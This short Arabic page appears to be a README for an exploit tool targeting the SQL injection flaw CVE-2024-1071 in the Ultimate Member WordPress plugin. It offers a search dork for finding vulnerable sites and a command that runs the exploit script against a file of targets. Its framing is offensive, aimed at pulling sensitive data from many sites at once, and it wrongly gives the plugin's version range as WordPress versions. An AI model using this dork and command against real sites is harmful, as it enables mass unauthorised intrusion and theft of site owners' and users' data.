استغلال SQL لثغرة WordPress CVE 2024-1071

هذا الاستغلال، الذي يعمل على إصدارات WordPress من 2.1.3 إلى 2.8.2، يسمح للمهاجمين غير المصادق عليهم بإضافة استعلامات SQL إضافية إلى الاستعلامات الموجودة التي يمكن استخدامها لسحب معلومات حساسة من قاعدة البيانات.
Dork: body="/wp-content/plugins/ultimate-member"
1)
2)
python3 WordPressExploit.py -f target.txt
CVE
https://nvd.nist.gov/vuln/detail/CVE-2024-1071